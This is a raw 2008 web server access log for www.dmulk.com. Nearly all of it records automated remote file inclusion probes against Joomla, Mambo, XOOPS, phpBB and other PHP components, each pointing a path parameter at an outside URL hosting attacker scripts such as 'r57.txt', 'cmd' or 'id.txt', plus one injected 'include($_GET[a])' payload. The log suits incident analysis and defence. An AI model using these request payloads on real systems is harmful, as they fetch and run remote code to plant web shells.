74.53.197.2 - - [16/May/2008:09:34:34 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://83.222.131.90/~legitimi/subscription/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:09:34:38 -0700] "GET /logs/access_080218.log//skin/zero_vote/error.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:34:43 -0700] "GET /logs/access_080418.log/phphtml.php?htmlclass_path=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.34.68.43 - - [16/May/2008:09:34:55 -0700] "GET /logs/access_080327.log//?mosConfig_absolute_path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:34:57 -0700] "GET /logs/access_071218.log/@rfihttp://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:34:58 -0700] "GET /@rfihttp://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.116.11 - - [16/May/2008:09:34:58 -0700] "GET /logs/@rfihttp://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.70.4.160 - - [16/May/2008:09:35:03 -0700] "GET /logs/access_071230.log/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.177.96.168 - - [16/May/2008:09:35:03 -0700] "GET /logs/access_080110.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.4.160 - - [16/May/2008:09:35:20 -0700] "GET /logs/access_080218.log/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.74.39 - - [16/May/2008:09:35:23 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
202.60.74.39 - - [16/May/2008:09:35:23 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
74.53.197.2 - - [16/May/2008:09:35:44 -0700] "GET /logs/access_080215.log/modules/Neos_Chronos/header.php?base_folder=http://83.222.131.90/~legitimi/subscription/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [16/May/2008:09:36:04 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zul.com.pl/mambots/system/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:09:36:05 -0700] "GET /logs/access_080330.log//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:09:36:10 -0700] "GET //?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
217.197.154.34 - - [16/May/2008:09:36:10 -0700] "GET /logs//?mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 47704 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [16/May/2008:09:36:21 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zul.com.pl/mambots/system/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:36:28 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.38.88.68 - - [16/May/2008:09:36:37 -0700] "GET /logs/access_080120.log/index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:09:36:38 -0700] "GET /retreat1/webcam/retreat1_00408.jpg HTTP/1.1" 200 15339 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:09:36:40 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:09:36:40 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:36:41 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:36:41 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
196.38.88.68 - - [16/May/2008:09:37:06 -0700] "GET /logs/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.182.59 - - [16/May/2008:09:37:14 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
81.169.182.59 - - [16/May/2008:09:37:15 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
81.169.182.59 - - [16/May/2008:09:37:15 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
81.169.182.59 - - [16/May/2008:09:37:15 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:09:37:26 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:09:37:26 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:09:37:27 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
80.82.209.212 - - [16/May/2008:09:37:33 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/nn.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
80.82.209.212 - - [16/May/2008:09:37:33 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/nn.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
195.70.4.160 - - [16/May/2008:09:38:10 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.136.6.38 - - [16/May/2008:09:38:14 -0700] "GET /logs//config.inc.php?config%5broot_dir%5d=http://zul.com.pl/mambots/system/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:38:20 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:38:25 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:38:25 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [16/May/2008:09:38:31 -0700] "GET //language.php?rootdir=http://zul.com.pl/mambots/system/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
193.136.6.38 - - [16/May/2008:09:38:35 -0700] "GET //config.inc.php?config%5broot_dir%5d=http://zul.com.pl/mambots/system/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
193.136.6.38 - - [16/May/2008:09:38:47 -0700] "GET /logs//language.php?rootdir=http://zul.com.pl/mambots/system/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:09:38:47 -0700] "GET //import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
160.99.12.231 - - [16/May/2008:09:38:47 -0700] "GET /logs//import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://83.222.131.90/~legitimi/mybase/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
122.220.195.22 - - [16/May/2008:09:39:09 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://patch.mandul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.22 - - [16/May/2008:09:39:09 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://patch.mandul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.22 - - [16/May/2008:09:39:10 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://patch.mandul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.47.80.135 - - [16/May/2008:09:39:42 -0700] "GET /mobileoffice/Picture_009.jpg HTTP/1.1" 200 604746 "-" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)" "www.dmulk.com"
80.67.23.140 - - [16/May/2008:09:39:55 -0700] "GET /logs/access_080215.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://lollywoodz.com/photos/mediatemp/princeid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.140 - - [16/May/2008:09:39:55 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://lollywoodz.com/photos/mediatemp/princeid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.140 - - [16/May/2008:09:39:56 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://lollywoodz.com/photos/mediatemp/princeid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:09:40:03 -0700] "GET /logs/access_080327.log//skin/zero_vote/ask_password.php?dir=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.133.159.85 - - [16/May/2008:09:40:09 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/nn.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
189.133.159.85 - - [16/May/2008:09:40:09 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/nn.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
80.67.23.140 - - [16/May/2008:09:41:05 -0700] "GET /logs/access_080119.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://lollywoodz.com/photos/mediatemp/princeid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.83 - - [16/May/2008:09:41:30 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [16/May/2008:09:41:31 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.83 - - [16/May/2008:09:41:31 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.23.140 - - [16/May/2008:09:41:32 -0700] "GET /logs/access_080121.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://lollywoodz.com/photos/mediatemp/princeid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.78.116.71 - - [16/May/2008:09:41:43 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:09:41:50 -0700] "GET /retreat1/webcam/retreat1_00413.jpg HTTP/1.1" 200 15320 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
201.67.157.165 - - [16/May/2008:09:41:54 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.67.157.165 - - [16/May/2008:09:41:55 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
201.67.157.165 - - [16/May/2008:09:41:56 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
208.116.44.60 - - [16/May/2008:09:42:08 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [16/May/2008:09:42:08 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [16/May/2008:09:42:08 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [16/May/2008:09:42:08 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [16/May/2008:09:42:08 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [16/May/2008:09:42:08 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.70.4.160 - - [16/May/2008:09:42:15 -0700] "GET /logs/access_080221.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
196.38.88.68 - - [16/May/2008:09:42:40 -0700] "GET /logs/access_071230.log/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.44.60 - - [16/May/2008:09:43:26 -0700] "GET /logs/access_080201.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [16/May/2008:09:43:33 -0700] "GET /logs//displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [16/May/2008:09:43:34 -0700] "GET /logs/access_080201.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [16/May/2008:09:43:38 -0700] "GET //displayCategory.php?basepath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:09:44:07 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:09:44:07 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:09:44:08 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.38.88.68 - - [16/May/2008:09:44:27 -0700] "GET /logs/access_080109.log/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.42.133.2 - - [16/May/2008:09:44:44 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
89.42.133.2 - - [16/May/2008:09:44:44 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lopesgarcia.pt/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:09:44:49 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [16/May/2008:09:44:49 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:45:13 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:45:13 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:45:13 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
196.38.88.68 - - [16/May/2008:09:45:14 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
196.38.88.68 - - [16/May/2008:09:45:15 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.67.157.165 - - [16/May/2008:09:45:19 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
222.236.47.176 - - [16/May/2008:09:45:23 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.92.87.157 - - [16/May/2008:09:45:43 -0700] "GET /logs/access_071221.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.48.10.14 - - [16/May/2008:09:46:14 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mas-manos.com.mx/images/banners/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.10.14 - - [16/May/2008:09:46:14 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mas-manos.com.mx/images/banners/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.10.14 - - [16/May/2008:09:46:14 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.mas-manos.com.mx/images/banners/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [16/May/2008:09:46:25 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/nn.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
212.116.174.9 - - [16/May/2008:09:46:25 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://1nb0x.iespana.es/nn.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
122.220.195.22 - - [16/May/2008:09:47:03 -0700] "GET /logs/access_080309.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://patch.mandul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:09:47:05 -0700] "GET /retreat1/webcam/retreat1_00421.jpg HTTP/1.1" 200 28809 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:47:38 -0700] "GET /logs/access.log/(administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=)http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:47:38 -0700] "GET /(administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=)http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:09:47:38 -0700] "GET /logs/(administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=)http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.222.27.201 - - [16/May/2008:09:47:42 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mamont-krr.ru/upload/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
